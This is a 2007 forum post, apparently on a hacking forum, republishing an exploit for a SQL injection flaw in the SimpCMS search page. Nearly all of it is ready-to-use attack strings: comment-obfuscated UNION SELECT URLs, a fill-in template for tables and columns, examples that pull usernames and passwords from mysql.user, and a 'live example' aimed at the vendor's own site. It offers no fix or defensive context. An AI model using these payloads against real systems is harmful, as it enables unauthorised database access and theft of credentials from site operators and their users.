nullbyte Posted September 17, 2007 Report Share Posted September 17, 2007 SimpCMS <= all Remote SQL Injection VulnerabilityFound By : ú Cold z3ro , [url]http://www.hackteach.org/[/url]Script : [url]http://www.simpcms.com/[/url]====================================Exploit :/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*OR/index.php?site=searchin search area insert your query$query = 1)'/**/union/**/select/**/0,1,2,3,$COLUMN,5,6/**/from/**/$TABLE/*$TABLE = "categories" OR "news" OR "mysql.user" OR "mysql.db" OR "information_schema.tables"$COLUMN = "name" OR "id" OR "username" OR "password"Examples :/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\1 ) From $TABLE categories :/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\2 ) From $TABLE news :/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,id,5,6/**/from/**/news/*/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\3 ) From $TABLE mysql.user :/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,username,5,6/**/from/**/mysql.user/*/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,password,5,6/**/from/**/mysql.user/*/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\====================================Live Example :[url]http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1[/url])'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/* Quote Link to comment Share on other sites More sharing options...
